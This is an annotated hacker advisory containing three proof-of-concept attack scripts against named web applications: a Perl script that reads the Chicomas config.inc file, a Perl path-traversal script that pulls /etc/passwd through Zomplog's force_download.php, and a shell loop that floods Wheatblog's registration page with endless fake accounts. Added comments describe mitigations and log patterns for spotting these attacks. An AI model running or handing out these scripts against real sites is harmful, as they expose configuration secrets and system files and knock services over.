##############################################
##Vulnerability in Multiple Web Application
## I Can't Hack Website Application :(
##############################################
#I just need some games, Reviewing web application
#in a night long
#############
#Just For Fun - Just For Shit - Stupid 0day
#Lamme web bugs, lamme advisory, nothing special
#############################################
## Chicomas Configuration File Disclosure
## Low risk severity
## Use .htaccess to protect config.inc
#############################################
Stupid PoC :
#!/usr/bin/perl
#Chicomas Configuration File disclosure
#Read Installation Guide in folder doc/install.en.txt
#After installation, config.inc file is created in chicomas installation path
#By default install, config.inc is public readable
#
# What this shows: an unauthenticated GET for <install path>config.inc is
# sent and the response is printed, so whatever the installer wrote into
# config.inc is readable by any client that can reach the site.
# Mitigation stated by the advisory: deny access to config.inc via .htaccess.
# NOTE(review): keeping the file outside the document root would presumably
# close the same gap - confirm against the Chicomas install layout.
# Detection: requests ending in /config.inc in the web-server access log.

# Print usage and stop unless a second argument (the install path) is given.
if(!$ARGV[1])
{
    print "Ph03n1X of kandangjamur\n";
    # NOTE(review): the argument names look lost from this usage string;
    # the example line below shows the expected order (host, path).
    print "Use : perl $0 \n";
    print "Example : perl $0 example.com /chicomas/\n";
    exit;
}
use IO::Socket;
# Plain TCP connection to port 80 of the host named in $ARGV[0]. The return
# value is not checked, so a failed connect leaves $s undefined.
$s = new IO::Socket::INET(
    Proto => "tcp",
    PeerAddr => $ARGV[0],
    PeerPort => "80",
);
# Request path = install path from $ARGV[1] with "config.inc" appended.
$req=$ARGV[1]."config.inc";
# NOTE(review): the request line ends right after the path; "HTTP/1.1" is
# sent on a line of its own. String left exactly as published.
print $s "GET $req\r\nHTTP/1.1\r\nHost: $ARGV[0]\r\n\r\n\r\n";
# Copy everything the server sends back to stdout, line by line.
while(<$s>){
    print;
}
close $s;
#################################################
## ZompLog Blog Arbitrary File Disclosure
## Low-Medium Risk Severity
#################################################
Stupid PoC :
#!/usr/bin/perl
#Zomplog 3.8.2 Arbitrary Files Download
#
#
# What this shows: upload/force_download.php is requested with a `file`
# value chosen by the caller, and the advisory's own example passes an
# absolute path outside the application (/etc/passwd).
# NOTE(review): force_download.php is not shown on this page; the title
# implies it applies no restriction to `file`. The server-side fix would be
# to accept only a bare file name and resolve it inside the upload
# directory - confirm against the Zomplog source.
# Detection: access-log entries for force_download.php whose file parameter
# is an absolute path or contains directory separators.

# Print usage and stop unless a third argument (the file to fetch) is given.
if(!$ARGV[2])
{
    print "Ph03n1X of kandangjamur | king_purba@yahoo.co.uk\n";
    # NOTE(review): the argument names look lost from this usage string;
    # the example line below shows the expected order (host, path, file).
    print "Use : perl $0 \n";
    print "Example : perl $0 example.com /zlog/ /etc/passwd\n";
    exit;
}
use IO::Socket;
# Plain TCP connection to port 80 of the host named in $ARGV[0]; the return
# value is not checked here either.
$s = new IO::Socket::INET(
    Proto => "tcp",
    PeerAddr => $ARGV[0],
    PeerPort => "80",
);
# Request path = install path + download script, with $ARGV[2] appended
# unmodified (no URL-encoding) as the `file` query parameter.
$req=$ARGV[1]."upload/force_download.php?file=".$ARGV[2];
# Same request shape as the first script: "HTTP/1.1" follows on its own line.
print $s "GET $req\r\nHTTP/1.1\r\nHost: $ARGV[0]\r\n\r\n\r\n";
# Copy everything the server sends back to stdout, line by line.
while(<$s>){
    print;
}
close $s;
###################################################
##Wheatblog Auto Create User
##Database Storage Flooding/DoS
## Low-Medium Risk Severity
################################################### Stupid PoC : #!/bin/sh #Autocreate User Wheatblog version < 1.1 #Impact : Storage Flooding/DoS #Ph03n1X / kandangjamur i=1 while [ TRUE ] do curl -d "login=userqu$i&password=taiklah123&email=aoqu$i@webku$i.com" http://example.com/testing/wblog/registration.php?action=process let i++ done #EOF #################################################### ## FINISH THIS STUFF ####################################################